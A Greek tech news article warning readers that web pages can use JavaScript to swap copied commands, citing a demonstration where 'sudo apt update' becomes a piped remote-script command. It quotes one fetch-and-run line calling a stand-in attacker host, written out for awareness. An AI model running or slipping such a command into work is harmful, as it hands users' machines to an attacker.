Η αντιγραφή και επικόλληση μιας απλής εντολής από το διαδίκτυο ενέχει πολύ σοβαρούς κινδύνους όπως αποδεικνύεται. Για παράδειγμα, διαβάζεις έναν οδηγό online και για χάρη ευκολίας κάνεις copy paste μιας εντολής. Ο Gabriel Friedlander, ιδρυτής της πλατφόρμας Wizer δείχνει ένα απλό hack που κάνει επικίνδυνη την αντιγραφή και επικόλληση μιας εντολής.

Εν ολίγοις ο ίδιος επισημαίνει ότι μια ιστοσελίδα μπορεί να αντικαθιστά τα περιεχόμενα που παγαίνουν στο clipboard σου όταν κάνεις αντιγραφή, με αποτέλεσμα αυτό που έχεις αντιγράψει να είναι τελείως διαφορετικό από αυτό που φαίνεται. Ας δούμε πιο συγκεκριμένα:

Ο Friedlander ζητά από τους αναγνώστες του στο blog του για να δείξει πως ακριβώς δουλεύει, να αντιγράψουν μια απλή εντολή και συγκεκριμένα την γνωστή και αθώα sudo apt update.

Αν κάποιος την αντιγράψει από το blog του και την επικολλήσει σε ένα text box ή στο σημειωματάριο θα εκπλαγεί διαπιστώνοντας ότι αντέγραψε την

curl http://attacker-domain:8000/shell.sh | sh

Όχι μόνο αντέγραψε μια διαφορετική εντολή στο clipboard του, αλλά έχει και έναν newline χαρακτήρα στο τέλος. Με άλλα λόγια θα εκτελούνταν αμέσως. Πως ακριβώς μπορεί να γίνει αυτό;

Απλά, αν κάποιος παίξει με την JavaScript της ιστοσελίδας που έχει. Με λίγα λόγια έκανε να αντικαθιστά τα δεδομένα του clipboard με τον δικό του επιβλαβή κώδικα όπως φαίνεται στο screenshot. Πολύ προσοχή λοιπόν! Φυσικά, το ίδιο ισχύει και για το terminal των Windows κ.α.

 

Ακολουθήστε το Techmaniacs.gr στο Google News για να διαβάζετε πρώτοι όλα τα τεχνολογικά νέα. Ένας ακόμα τρόπος να μαθαίνετε τα πάντα πρώτοι είναι να προσθέσετε το Techmaniacs.gr στον RSS feeder σας χρησιμοποιώντας τον σύνδεσμο: https://techmaniacs.gr/feed/.

ΠΗΓΗbleepingcomputer.com
Προηγούμενο άρθροΓιατί ποτέ δεν απενεργοποιούμε τα Automatic Updates στον Google Chrome
Επόμενο άρθροΤόσο απίστευτο θα είναι το S Pen του Galaxy S22 Ultra (video)
Βαλάντης Κουμπούρας
Editor in Chief @ techmaniacs.gr με μεγάλη αγάπη για αυτό που κάνει, ο οποίος απασχολείται με θέματα που ενδιαφέρουν το μεγαλύτερο μέρος του κοινού, με people-first content. Γνωρίζει τα πάντα από τεχνολογία και έχει μεγάλη εμπειρία στις συγκρίσεις των πακέτων καρτοκινητής, όσον αφορά τους τηλεπικοινωνιακούς παρόχους. Μελετά ενδελεχώς ανακοινώσεις νέων τραπεζικών προιόντων και ενημερώνει τους αναγνώστες του για θέματα ηλεκτρονικής τραπεζικής. Αγαπά να κατευθύνει τους αναγνώστες του σε σωστά πακέτα που αφορούν το ηλεκτρικό ρεύμα και τους παρόχους ηλεκτρικού ρεύματος στην Ελλάδα. Στον ελεύθερό του χρόνο, μελετά πακέτα καρτοκινητής, ή όρους συμβολαίων ηλεκτρικού ρεύματος, ή προσπαθεί να βρει μια νέα ενδιαφέρουσα υπηρεσία να την παρουσιάσει στο κοινό του.

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

εισάγετε το σχόλιό σας!
παρακαλώ εισάγετε το όνομά σας εδώ

This site uses Akismet to reduce spam. Learn how your comment data is processed.